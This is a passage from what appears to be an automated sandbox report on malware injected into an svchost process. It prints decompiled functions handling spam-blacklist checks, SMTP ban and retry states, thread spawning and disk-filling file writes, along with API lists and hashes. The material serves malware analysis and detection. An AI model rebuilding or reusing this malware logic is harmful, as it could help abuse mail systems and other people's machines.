					 *0x1322f4 =  *0x1322f4 | 0x00000001;
					 *0x1322f0 = E0012F04E(0);
				}
				if(( *0x1322f4 & 0x00000002) == 0) {
					 *0x1322f4 =  *0x1322f4 | 0x00000002;
					 *0x1322ec = E0012F04E(0);
				}
				if(( *0x1322f4 & 0x00000004) == 0) {
					 *0x1322f4 =  *0x1322f4 | 0x00000004;
					 *0x1322e8 = E0012F04E(0);
				}
				_t35 = GetTickCount();
				_t96 =  *((intOrPtr*)(_t104 + 0x114));
				if(_t35 -  *0x1322e0 > 0xdbba0) {
					_t58 =  *0x132000; // 0x130288
					_t103 = 0;
					if( *_t58 != 0) {
						_t60 = 0x132000;
						do {
							if(E00122684( *_t60) == 0) {
								goto L11;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000004;
								if(E00121978(_t61, 0x50) != 0) {
									_t12 = _t96 + 0x14;
									 *_t12 =  *(_t96 + 0x14) | 0x00000002;
									__eflags =  *_t12;
								} else {
									goto L11;
								}
							}
							goto L14;
							L11:
							_t103 = _t103 + 1;
							_t60 = 0x132000 + _t103 * 4;
						} while ( *((char*)( *(0x132000 + _t103 * 4))) != 0);
					}
					L14:
					 *0x1322e0 = GetTickCount();
				}
				if(GetTickCount() -  *0x1322dc > 0xdbba0) {
					_t53 =  *0x132000; // 0x130288
					_t102 = 0;
					if( *_t53 != 0) {
						_t55 = 0x132000;
						do {
							if(E00122EF8( *_t55) == 0) {
								goto L20;
							} else {
								 *(_t96 + 0x14) =  *(_t96 + 0x14) | 0x00000008;
								if(E00121978(_t56, 0x19) != 0) {
									_t18 = _t96 + 0x14;
									 *_t18 =  *(_t96 + 0x14) | 0x00000001;
									__eflags =  *_t18;
								} else {
									goto L20;
								}
							}
							goto L23;
							L20:
							_t102 = _t102 + 1;
							_t55 = 0x132000 + _t102 * 4;
						} while ( *((char*)( *(0x132000 + _t102 * 4))) != 0);
					}
					L23:
					 *0x1322dc = GetTickCount();
				}
				 *(_t96 + 0x28) = GetTickCount() / 0x3e8;
				 *((intOrPtr*)(_t96 + 0x2c)) = GetTickCount() / 0x3e8 -  *0x132110;
				_t45 = E0012F04E(0) -  *0x1322f0;
				_t93 = "localcfg";
				_t122 = _t45 -  *0x1322e4; // 0x12c
				if(_t122 > 0) {
					E0012E854(1, "localcfg", "rbl_bl", _t104 + 0x18, 0x100, 0x130264);
					_t51 = E0012E819(1, _t93, "rbl_ip", 0);
					_t104 = _t104 + 0x28;
					if(_t51 == 0) {
						L28:
						 *0x1322e4 = 0x12c;
					} else {
						_t124 =  *((intOrPtr*)(_t104 + 0x10));
						if( *((intOrPtr*)(_t104 + 0x10)) == 0) {
							goto L28;
						} else {
							_push(_t104 + 0x10);
							_push(_t51);
							 *((intOrPtr*)(_t96 + 0x38)) = E00121C5F(_t124);
							 *0x1322e4 = 0x4b0;
						}
					}
				}
				_t47 = E0012F04E(0) -  *0x1322f0;
				if(_t47 > 0x4b0) {
					E0012EA84(1, _t93, "net_type",  *(_t96 + 0x14));
					_t47 = E0012F04E(0);
					 *0x1322f0 = _t47;
				}
				return _t47;
			}














                                                                                0x0012201e
                                                                                0x00122020
                                                                                0x0012202f
                                                                                0x0012202f
                                                                                0x0012203b
                                                                                0x0012203d
                                                                                0x0012204c
                                                                                0x0012204c
                                                                                0x00122058
                                                                                0x0012205a
                                                                                0x00122069
                                                                                0x00122069
                                                                                0x00122078
                                                                                0x00122080
                                                                                0x0012208e
                                                                                0x00122090
                                                                                0x00122095
                                                                                0x0012209a
                                                                                0x0012209c
                                                                                0x001220a1
                                                                                0x001220ab
                                                                                0x00000000
                                                                                0x001220ad
                                                                                0x001220ad
                                                                                0x001220bd
                                                                                0x001220d0
                                                                                0x001220d0
                                                                                0x001220d0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x001220bd
                                                                                0x00000000
                                                                                0x001220bf
                                                                                0x001220bf
                                                                                0x001220c0
                                                                                0x001220c9
                                                                                0x001220ce
                                                                                0x001220d4
                                                                                0x001220d6
                                                                                0x001220d6
                                                                                0x001220e5
                                                                                0x001220e7
                                                                                0x001220ec
                                                                                0x001220f1
                                                                                0x001220f3
                                                                                0x001220f8
                                                                                0x00122102
                                                                                0x00000000
                                                                                0x00122104
                                                                                0x00122104
                                                                                0x00122114
                                                                                0x00122127
                                                                                0x00122127
                                                                                0x00122127
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122114
                                                                                0x00000000
                                                                                0x00122116
                                                                                0x00122116
                                                                                0x00122117
                                                                                0x00122120
                                                                                0x00122125
                                                                                0x0012212b
                                                                                0x0012212d
                                                                                0x0012212d
                                                                                0x0012213f
                                                                                0x00122151
                                                                                0x00122159
                                                                                0x00122160
                                                                                0x0012216a
                                                                                0x00122170
                                                                                0x00122189
                                                                                0x00122197
                                                                                0x0012219c
                                                                                0x001221a1
                                                                                0x001221c1
                                                                                0x001221c1
                                                                                0x001221a3
                                                                                0x001221a3
                                                                                0x001221a7
                                                                                0x00000000
                                                                                0x001221a9
                                                                                0x001221ad
                                                                                0x001221ae
                                                                                0x001221b6
                                                                                0x001221b9
                                                                                0x001221b9
                                                                                0x001221a7
                                                                                0x001221a1
                                                                                0x001221d1
                                                                                0x001221da
                                                                                0x001221e7
                                                                                0x001221ed
                                                                                0x001221f5
                                                                                0x001221f5
                                                                                0x00122204

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00122078
                                                                                • GetTickCount.KERNEL32 ref: 001220D4
                                                                                • GetTickCount.KERNEL32 ref: 001220DB
                                                                                • GetTickCount.KERNEL32 ref: 0012212B
                                                                                • GetTickCount.KERNEL32 ref: 00122132
                                                                                • GetTickCount.KERNEL32 ref: 00122142
                                                                                  • Part of subcall function 0012F04E: SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,0012E342,00000000,76A1F210,80000001,00000000,0012E513,?,00000000,00000000,?,000000E4), ref: 0012F089
                                                                                  • Part of subcall function 0012F04E: GetSystemTimeAsFileTime.KERNEL32(80000001,?,?,?,0012E342,00000000,76A1F210,80000001,00000000,0012E513,?,00000000,00000000,?,000000E4,000000C8), ref: 0012F093
                                                                                  • Part of subcall function 0012E854: lstrcpyA.KERNEL32(00000001,?,?,0012D8DF,00000001,localcfg,except_info,00100000,00130264), ref: 0012E88B
                                                                                  • Part of subcall function 0012E854: lstrlenA.KERNEL32(00000001,?,0012D8DF,00000001,localcfg,except_info,00100000,00130264), ref: 0012E899
                                                                                  • Part of subcall function 00121C5F: wsprintfA.USER32 ref: 00121CE1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$Time$FileSystem$lstrcpylstrlenwsprintf
                                                                                • String ID: localcfg$net_type$rbl_bl$rbl_ip
                                                                                • API String ID: 3976553417-1522128867
                                                                                • Opcode ID: a78f5bb04ad0ee85d8b924c79c384bc3c44fe026319a9775d485fbc947b001e1
                                                                                • Instruction ID: 764c08944396fb33f68c0307cfb5076ddd8a8236f2e00c1589b21368d4b11940
                                                                                • Opcode Fuzzy Hash: a78f5bb04ad0ee85d8b924c79c384bc3c44fe026319a9775d485fbc947b001e1
                                                                                • Instruction Fuzzy Hash: E451DE719043566EE729FF34FE46F6B3BE5EB14314F10002EF605869A2DBB498A8CA15
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012C2DC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 182threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 92%
                                                                                			E0012C2DC(void* __ebp, signed int _a4) {
				void* _t86;
				signed int _t90;
				signed int _t91;
				long _t93;
				signed int _t95;
				signed int _t101;
				signed int _t108;
				signed int _t112;
				signed int _t115;
				long _t117;
				long _t118;
				signed int _t120;
				struct _SECURITY_ATTRIBUTES* _t122;
				signed int _t123;
				signed int _t132;
				signed int _t148;
				signed char _t151;
				signed int _t154;
				signed int _t156;
				signed char* _t157;
				void* _t158;
				signed int _t163;

				_t158 = __ebp;
				_t157 = _a4;
				E0012A4C7(_t157);
				_t122 = 0;
				if(_t157[0x44] == 0) {
					_t157[8] = 0;
					_t157[0x34] = 0;
					_t157[0x38] = 0;
					_t157[0x3c] = 0;
					_t157[0x54] = 0;
					_t157[0x40] = 0;
					_t157[0x58] = 0;
					L31:
					_t82 =  &(_t157[4]); // 0x12c4e4
					_t86 = _t82;
					_t148 =  !( *_t157) & 0x00000001;
					_t157[0x5c] = _t122;
					_t84 =  &(_t157[8]); // 0xfffffdf0
					if( *_t86 >=  *_t84) {
						L34:
						return _t86;
					}
					_t86 = CreateThread(_t122, _t122, E0012B535, InterlockedIncrement(_t86) | _t148 << 0x00000010, _t122, _t122);
					if(_t86 == _t122) {
						goto L34;
					}
					return CloseHandle(_t86);
				}
				if(_t157[8] != 0) {
					__eflags = _t157[0x48];
					if(_t157[0x48] == 0) {
						L5:
						_t12 =  &(_t157[0x10]); // 0x59be026a
						_t90 =  *_t12;
						_t157[8] = _t90;
						_t157[0x34] = _t90;
						_t91 = _t90 * 0x3e8;
						__eflags = _t91;
						_t157[0x38] = _t122;
						_t157[0x3c] = _t122;
						_t157[0x1c] = _t90 * 0x2710;
						_t157[0x20] = _t91;
						goto L6;
					}
					_t118 = GetTickCount();
					_t11 =  &(_t157[0x48]); // 0x13740013
					__eflags = _t118 -  *_t11 - 0x927c0;
					if(_t118 -  *_t11 < 0x927c0) {
						goto L6;
					}
					goto L5;
				} else {
					_t4 =  &(_t157[0xc]); // 0x5756c359
					_t120 =  *_t4;
					_t157[0x1c] = _t120 * 0x2710;
					_t157[8] = _t120;
					_t157[0x20] = _t120 * 0x3e8;
					_t157[0x34] = _t120;
					_t157[0x48] = GetTickCount();
					L6:
					if(( *_t157 & 0x00000001) == 0) {
						_t73 =  &(_t157[0x34]); // 0xa1c35e5f
						_t157[8] =  *_t73;
						goto L31;
					}
					_t93 = GetTickCount();
					_t21 =  &(_t157[0x4c]); // 0x26fce850
					if(_t93 -  *_t21 >= 0x2710) {
						goto L31;
					}
					if(_t157[0x54] == _t122) {
						_t95 = 0x3e8;
					} else {
						_t117 = GetTickCount();
						_t23 =  &(_t157[0x54]); // 0x13366c1d
						_t95 = _t117 -  *_t23;
					}
					_t123 = _t95;
					if(_t95 < 1) {
						_t123 = 1;
					}
					if(_t123 > 0x4e20) {
						_t123 = 0x4e20;
					}
					_t24 =  &(_t157[0x58]); // 0x701d8900
					_t25 =  &(_t157[0x40]); // 0x74c33b57
					_t151 =  *_t25;
					_t132 =  *_t24 * 0x3e8;
					_push(_t158);
					asm("cdq");
					_push(0x14);
					_a4 = _t123;
					asm("cdq");
					_t101 = (_t132 - _t151) * _t123 / 0x3e8 / 0x3e8;
					if(_t101 == 0) {
						__eflags = _t132 - _t151;
						if(__eflags == 0) {
							goto L22;
						}
						if(__eflags >= 0) {
							_t156 = _t151 + 1;
							__eflags = _t156;
						} else {
							_t156 = _t151 - 1;
						}
						goto L21;
					} else {
						_t156 = _t151 + _t101;
						L21:
						_t157[0x40] = _t156;
						L22:
						if(_t157[0x40] < 0) {
							_t157[0x40] = _t157[0x40] & 0x00000000;
						}
						_t39 =  &(_t157[0x40]); // 0x74c33b57
						_t163 = (0xc8 -  *_t39) * 0x14;
						if(_t123 > 0x3e8) {
							_a4 = 0x3e8;
						}
						asm("cdq");
						_t46 =  &(_t157[0x14]); // 0x5f001320
						_t47 =  &(_t157[0x10]); // 0x59be026a
						asm("cdq");
						_t49 =  &(_t157[0x30]); // 0xe4754f45
						_t54 =  &(_t157[0x20]); // 0x406a0000
						_t108 = E0012A505(_t163 * _a4 / 0x3e8 /  *_t49 +  *_t54,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
						asm("cdq");
						_t56 =  &(_t157[0x2c]); // 0xc68314c4
						_t157[0x20] = _t108;
						_t112 = E0012A505(_t163 /  *_t56 + _t108,  *_t47 * 0x3e8,  *_t46 * 0x3e8);
						asm("cdq");
						_t122 = 0;
						_t157[0x58] = 0;
						_t154 = _t112 / 0x3e8;
						_t157[0x54] = GetTickCount();
						_t68 =  &(_t157[0x34]); // 0xa1c35e5f
						_t115 =  *_t68;
						if(_t115 <= _t154) {
							_t157[8] = _t115;
							_t157[0x20] = _t115 * 0x3e8;
						} else {
							_t157[8] = _t154;
							_t157[0x1c] = _t154 * 0x2710;
						}
						goto L31;
					}
				}
			}

























                                                                                0x0012c2dc
                                                                                0x0012c2de
                                                                                0x0012c2e4
                                                                                0x0012c2e9
                                                                                0x0012c2ef
                                                                                0x0012c482
                                                                                0x0012c485
                                                                                0x0012c488
                                                                                0x0012c48b
                                                                                0x0012c48e
                                                                                0x0012c491
                                                                                0x0012c494
                                                                                0x0012c497
                                                                                0x0012c499
                                                                                0x0012c499
                                                                                0x0012c4a0
                                                                                0x0012c4a3
                                                                                0x0012c4a6
                                                                                0x0012c4a9
                                                                                0x0012c4d5
                                                                                0x0012c4d5
                                                                                0x0012c4d5
                                                                                0x0012c4c1
                                                                                0x0012c4c9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012c4cc
                                                                                0x0012c2fe
                                                                                0x0012c326
                                                                                0x0012c329
                                                                                0x0012c337
                                                                                0x0012c337
                                                                                0x0012c337
                                                                                0x0012c342
                                                                                0x0012c345
                                                                                0x0012c348
                                                                                0x0012c348
                                                                                0x0012c34e
                                                                                0x0012c351
                                                                                0x0012c354
                                                                                0x0012c357
                                                                                0x00000000
                                                                                0x0012c357
                                                                                0x0012c32b
                                                                                0x0012c32d
                                                                                0x0012c330
                                                                                0x0012c335
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012c300
                                                                                0x0012c300
                                                                                0x0012c300
                                                                                0x0012c30b
                                                                                0x0012c316
                                                                                0x0012c319
                                                                                0x0012c31c
                                                                                0x0012c321
                                                                                0x0012c35a
                                                                                0x0012c35d
                                                                                0x0012c47a
                                                                                0x0012c47d
                                                                                0x00000000
                                                                                0x0012c47d
                                                                                0x0012c363
                                                                                0x0012c365
                                                                                0x0012c36d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012c376
                                                                                0x0012c37f
                                                                                0x0012c378
                                                                                0x0012c378
                                                                                0x0012c37a
                                                                                0x0012c37a
                                                                                0x0012c37a
                                                                                0x0012c384
                                                                                0x0012c389
                                                                                0x0012c38d
                                                                                0x0012c38d
                                                                                0x0012c395
                                                                                0x0012c397
                                                                                0x0012c397
                                                                                0x0012c399
                                                                                0x0012c39c
                                                                                0x0012c39c
                                                                                0x0012c39f
                                                                                0x0012c3ac
                                                                                0x0012c3ad
                                                                                0x0012c3b5
                                                                                0x0012c3b8
                                                                                0x0012c3bc
                                                                                0x0012c3bd
                                                                                0x0012c3c1
                                                                                0x0012c3c7
                                                                                0x0012c3c9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012c3cb
                                                                                0x0012c3d0
                                                                                0x0012c3d0
                                                                                0x0012c3cd
                                                                                0x0012c3cd
                                                                                0x0012c3cd
                                                                                0x00000000
                                                                                0x0012c3c3
                                                                                0x0012c3c3
                                                                                0x0012c3d1
                                                                                0x0012c3d1
                                                                                0x0012c3d4
                                                                                0x0012c3d8
                                                                                0x0012c3da
                                                                                0x0012c3da
                                                                                0x0012c3e3
                                                                                0x0012c3eb
                                                                                0x0012c3f0
                                                                                0x0012c3f2
                                                                                0x0012c3f2
                                                                                0x0012c3fd
                                                                                0x0012c405
                                                                                0x0012c408
                                                                                0x0012c419
                                                                                0x0012c41a
                                                                                0x0012c41d
                                                                                0x0012c421
                                                                                0x0012c42a
                                                                                0x0012c42b
                                                                                0x0012c430
                                                                                0x0012c436
                                                                                0x0012c43b
                                                                                0x0012c443
                                                                                0x0012c448
                                                                                0x0012c44b
                                                                                0x0012c453
                                                                                0x0012c456
                                                                                0x0012c456
                                                                                0x0012c45c
                                                                                0x0012c46c
                                                                                0x0012c475
                                                                                0x0012c45e
                                                                                0x0012c45e
                                                                                0x0012c467
                                                                                0x0012c467
                                                                                0x00000000
                                                                                0x0012c45c
                                                                                0x0012c3c1

                                                                                APIs
                                                                                  • Part of subcall function 0012A4C7: GetTickCount.KERNEL32 ref: 0012A4D1
                                                                                  • Part of subcall function 0012A4C7: InterlockedExchange.KERNEL32(?,00000001), ref: 0012A4FA
                                                                                • GetTickCount.KERNEL32 ref: 0012C31F
                                                                                • GetTickCount.KERNEL32 ref: 0012C32B
                                                                                • GetTickCount.KERNEL32 ref: 0012C363
                                                                                • GetTickCount.KERNEL32 ref: 0012C378
                                                                                • GetTickCount.KERNEL32 ref: 0012C44D
                                                                                • InterlockedIncrement.KERNEL32(0012C4E4), ref: 0012C4AE
                                                                                • CreateThread.KERNEL32 ref: 0012C4C1
                                                                                • CloseHandle.KERNEL32(00000000,?,0012C4E0,00133588,00128810), ref: 0012C4CC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$Interlocked$CloseCreateExchangeHandleIncrementThread
                                                                                • String ID: localcfg
                                                                                • API String ID: 1553760989-1857712256
                                                                                • Opcode ID: 050ef491b0bad6c4b8eeaf3cdbe94e6bfdc5927521e70ebd57c3c438e3cecdcf
                                                                                • Instruction ID: 038b00f513d314fc066e8019e2ad9e6ea88f2420a0e4f2770f155de0b00861dc
                                                                                • Opcode Fuzzy Hash: 050ef491b0bad6c4b8eeaf3cdbe94e6bfdc5927521e70ebd57c3c438e3cecdcf
                                                                                • Instruction Fuzzy Hash: 89515AB1A00B518FC728DF69D59452ABBE9FB48300B509D2EE68BC7A90D774E8548B90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0012BE31 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 152stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 98%
                                                                                			E0012BE31(signed int _a4, intOrPtr _a8) {
				signed int _v8;
				CHAR* _v12;
				int _v16;
				int _t50;
				int _t51;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t57;
				void* _t59;
				char* _t66;
				CHAR* _t68;
				int _t71;
				int _t72;
				void* _t76;
				intOrPtr _t78;
				signed int _t82;
				signed int _t83;
				signed int _t84;
				intOrPtr* _t86;
				void* _t88;
				void* _t91;
				void* _t92;

				_t83 = _a4;
				_t68 = _t83 + 4;
				_v12 = _t68;
				if(lstrcmpiA(_t68, "smtp_herr") == 0 || lstrcmpiA(_t68, "smtp_ban") == 0) {
					L3:
					_t72 = 0;
					_v16 = 0;
					if(_a8 == 3) {
						L25:
						if(lstrcmpiA(_v12, "smtp_herr") != 0) {
							if(lstrcmpiA(_v12, "smtp_ban") != 0) {
								_t50 = lstrcmpiA(_v12, "smtp_retr");
								_t51 = 0x133638;
								if(_t50 != 0) {
									_t51 = _a4;
								}
							} else {
								_t51 = 0x133634;
							}
						} else {
							_t51 = 0x133630;
						}
						_t86 =  *_t51;
						 *_t51 = _v16;
						if(_t86 == 0) {
							goto L36;
						} else {
							_t52 =  *_t86;
							_t84 = 0;
							while(_t52 != 0) {
								E0012EC2E(_t52);
								_t84 = _t84 + 1;
								_t52 =  *((intOrPtr*)(_t86 + _t84 * 4));
							}
							return E0012EC2E(_t86);
						}
					}
					_t55 =  *((intOrPtr*)(_t83 + 0x18));
					_t82 = 0;
					if(_t55 <= 0) {
						goto L25;
					} else {
						goto L5;
					}
					do {
						L5:
						if( *((char*)(_t83 + _t72 + 0x24)) == 0xa || _t72 == _t55 - 1) {
							_t82 = _t82 + 1;
						}
						_t72 = _t72 + 1;
					} while (_t72 < _t55);
					if(_t82 == 0) {
						goto L25;
					}
					_t70 = 4 + _t82 * 4;
					_t51 = E0012EBCC(4 + _t82 * 4);
					_pop(_t76);
					_v16 = _t51;
					if(_t51 == 0) {
						goto L36;
					}
					E0012EE2A(_t76, _t51, 0, _t70);
					_t57 =  *((intOrPtr*)(_t83 + 0x18));
					_v8 = _v8 & 0x00000000;
					_a4 = _a4 & 0x00000000;
					_t92 = _t91 + 0xc;
					if(_t57 > 0) {
						_t71 = _v16;
						do {
							_t78 =  *((intOrPtr*)(_t83 + _a4 + 0x24));
							if(_t78 == 0xa || _a4 == _t57 - 1) {
								_t88 = _a4 - _v8;
								if(_t78 != 0xa) {
									_t88 = _t88 + 1;
								}
								_t25 = _t88 + 1; // 0x1
								_t59 = E0012EBCC(_t25);
								 *_t71 = _t59;
								if(_t59 == 0) {
									goto L25;
								} else {
									E0012EE08(_t59, _t83 + _v8 + 0x24, _t88);
									_t92 = _t92 + 0xc;
									 *((char*)(_t88 +  *_t71)) = 0;
									if(_t88 > 0) {
										_t31 =  *_t71 - 1; // -1
										_t66 = _t88 + _t31;
										if( *_t66 == 0xd) {
											 *_t66 = 0;
										}
									}
									_t71 = _t71 + 4;
									_v8 = _v8 + _t88 + 1;
									goto L22;
								}
							}
							L22:
							_a4 = _a4 + 1;
							_t57 =  *((intOrPtr*)(_t83 + 0x18));
						} while (_a4 < _t57);
					}
					goto L25;
				} else {
					_t51 = lstrcmpiA(_t68, "smtp_retr");
					if(_t51 != 0) {
						L36:
						return _t51;
					}
					goto L3;
				}
			}

























                                                                                0x0012be40
                                                                                0x0012be43
                                                                                0x0012be4c
                                                                                0x0012be53
                                                                                0x0012be71
                                                                                0x0012be71
                                                                                0x0012be77
                                                                                0x0012be7a
                                                                                0x0012bf62
                                                                                0x0012bf6e
                                                                                0x0012bf83
                                                                                0x0012bf94
                                                                                0x0012bf98
                                                                                0x0012bf9d
                                                                                0x0012bf9f
                                                                                0x0012bf9f
                                                                                0x0012bf85
                                                                                0x0012bf85
                                                                                0x0012bf85
                                                                                0x0012bf70
                                                                                0x0012bf70
                                                                                0x0012bf70
                                                                                0x0012bfa2
                                                                                0x0012bfa7
                                                                                0x0012bfab
                                                                                0x00000000
                                                                                0x0012bfad
                                                                                0x0012bfad
                                                                                0x0012bfaf
                                                                                0x0012bfbe
                                                                                0x0012bfb4
                                                                                0x0012bfb9
                                                                                0x0012bfba
                                                                                0x0012bfbd
                                                                                0x00000000
                                                                                0x0012bfc8
                                                                                0x0012bfab
                                                                                0x0012be80
                                                                                0x0012be83
                                                                                0x0012be87
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012be8d
                                                                                0x0012be8d
                                                                                0x0012be92
                                                                                0x0012be9b
                                                                                0x0012be9b
                                                                                0x0012be9c
                                                                                0x0012be9d
                                                                                0x0012bea3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012bea9
                                                                                0x0012beb1
                                                                                0x0012beb6
                                                                                0x0012beb7
                                                                                0x0012bebc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012bec6
                                                                                0x0012becb
                                                                                0x0012bece
                                                                                0x0012bed2
                                                                                0x0012bed6
                                                                                0x0012bedb
                                                                                0x0012bee1
                                                                                0x0012bee4
                                                                                0x0012bee7
                                                                                0x0012beee
                                                                                0x0012bef9
                                                                                0x0012beff
                                                                                0x0012bf01
                                                                                0x0012bf01
                                                                                0x0012bf02
                                                                                0x0012bf06
                                                                                0x0012bf0c
                                                                                0x0012bf10
                                                                                0x00000000
                                                                                0x0012bf12
                                                                                0x0012bf1c
                                                                                0x0012bf23
                                                                                0x0012bf26
                                                                                0x0012bf2c
                                                                                0x0012bf30
                                                                                0x0012bf30
                                                                                0x0012bf37
                                                                                0x0012bf39
                                                                                0x0012bf39
                                                                                0x0012bf37
                                                                                0x0012bf49
                                                                                0x0012bf4c
                                                                                0x00000000
                                                                                0x0012bf4c
                                                                                0x0012bf10
                                                                                0x0012bf4f
                                                                                0x0012bf4f
                                                                                0x0012bf52
                                                                                0x0012bf55
                                                                                0x0012bf5a
                                                                                0x00000000
                                                                                0x0012be61
                                                                                0x0012be67
                                                                                0x0012be6b
                                                                                0x0012bfcd
                                                                                0x0012bfcd
                                                                                0x0012bfcd
                                                                                0x00000000
                                                                                0x0012be6b

                                                                                APIs
                                                                                • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0012BE4F
                                                                                • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0012BE5B
                                                                                • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0012BE67
                                                                                • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0012BF6A
                                                                                • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0012BF7F
                                                                                • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0012BF94
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcmpi
                                                                                • String ID: smtp_ban$smtp_herr$smtp_retr
                                                                                • API String ID: 1586166983-1625972887
                                                                                • Opcode ID: bb7acc1129f97147c97d601a241644b91ab4c546cde4f99e695c653dc5976291
                                                                                • Instruction ID: 96d0f6dc692c5f58cc0450054e26b444925ec9e92b52fa21b68cb4df356b169d
                                                                                • Opcode Fuzzy Hash: bb7acc1129f97147c97d601a241644b91ab4c546cde4f99e695c653dc5976291
                                                                                • Instruction Fuzzy Hash: E851D471A0832AEFDB15CF64EEC0BAABBE9AF14344F054055E941AB251D730EDA0CF90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00126A60 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00126A60(int __edx, CHAR* _a4, intOrPtr _a8, int _a12) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				void* _v12;
				long _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				long _v32;
				void* _t31;
				intOrPtr _t43;
				int _t44;
				void* _t53;
				int _t59;
				CHAR* _t68;
				void* _t69;
				int _t73;

				_t59 = __edx;
				_t68 = _a4;
				_t31 = CreateFileA(_t68, 0x40000000, 0, 0, 2, 0x80, 0);
				_v12 = _t31;
				if(_t31 == 0xffffffff) {
					 *0x132180 = 0x61040101;
					 *0x13217c = GetLastError();
					__eflags = 0;
					return 0;
				}
				_v8 =  *_t68;
				_v7 = _t68[1];
				_t63 = _a12;
				_v6 = _t68[2];
				_v5 = 0;
				if(GetDiskFreeSpaceA( &_v8,  &_v20,  &_v24,  &_v16,  &_v32) == 0) {
					L10:
					_t43 = E00126987(0x500000, _v12, _a8, _a12, _t63);
					_v28 = _t43;
					if(_t43 != 0) {
						_t44 = CloseHandle(_v12);
						__eflags = _t44;
						if(_t44 != 0) {
							L15:
							return _v28;
						}
						 *0x132180 = 0x61040103;
						 *0x13217c = GetLastError();
						CloseHandle(_v12);
						L14:
						DeleteFileA(_t68);
						goto L15;
					}
					 *0x132180 = 0x61040102;
					 *0x13217c = GetLastError();
					CloseHandle(_v12);
					goto L14;
				}
				_t53 = E0012EB0E(_v20 * _v24, 0, _v16, 0);
				_t69 = _t69 + 0x10;
				_t73 = _t59;
				if(_t73 < 0) {
					goto L10;
				}
				if(_t73 > 0 || _t53 > 0x6400000) {
					_t22 = E0012ECA5() % 0x500000 + 0xa00000; // 0xa00000
					_t63 = _t22;
					goto L10;
				} else {
					__eflags = _t59;
					if(__eflags < 0) {
						goto L10;
					}
					if(__eflags > 0) {
						L9:
						_t63 = (E0012ECA5() & 0x001fffff) + 0x300000;
						__eflags = (E0012ECA5() & 0x001fffff) + 0x300000;
						goto L10;
					}
					__eflags = _t53 - 0x3200000;
					if(_t53 <= 0x3200000) {
						goto L10;
					}
					goto L9;
				}
			}





















                                                                                0x00126a60
                                                                                0x00126a68
                                                                                0x00126a7d
                                                                                0x00126a83
                                                                                0x00126a89
                                                                                0x00126b8c
                                                                                0x00126b9c
                                                                                0x00126ba1
                                                                                0x00000000
                                                                                0x00126ba1
                                                                                0x00126a91
                                                                                0x00126a97
                                                                                0x00126a9e
                                                                                0x00126aa1
                                                                                0x00126ab8
                                                                                0x00126ac3
                                                                                0x00126b1d
                                                                                0x00126b27
                                                                                0x00126b2f
                                                                                0x00126b34
                                                                                0x00126b5f
                                                                                0x00126b61
                                                                                0x00126b63
                                                                                0x00126b86
                                                                                0x00000000
                                                                                0x00126b89
                                                                                0x00126b65
                                                                                0x00126b78
                                                                                0x00126b7d
                                                                                0x00126b7f
                                                                                0x00126b80
                                                                                0x00000000
                                                                                0x00126b80
                                                                                0x00126b36
                                                                                0x00126b49
                                                                                0x00126b4e
                                                                                0x00000000
                                                                                0x00126b4e
                                                                                0x00126ad2
                                                                                0x00126ad7
                                                                                0x00126ada
                                                                                0x00126adc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00126ade
                                                                                0x00126af5
                                                                                0x00126af5
                                                                                0x00000000
                                                                                0x00126afd
                                                                                0x00126afd
                                                                                0x00126aff
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00126b01
                                                                                0x00126b0a
                                                                                0x00126b17
                                                                                0x00126b17
                                                                                0x00000000
                                                                                0x00126b17
                                                                                0x00126b03
                                                                                0x00126b08
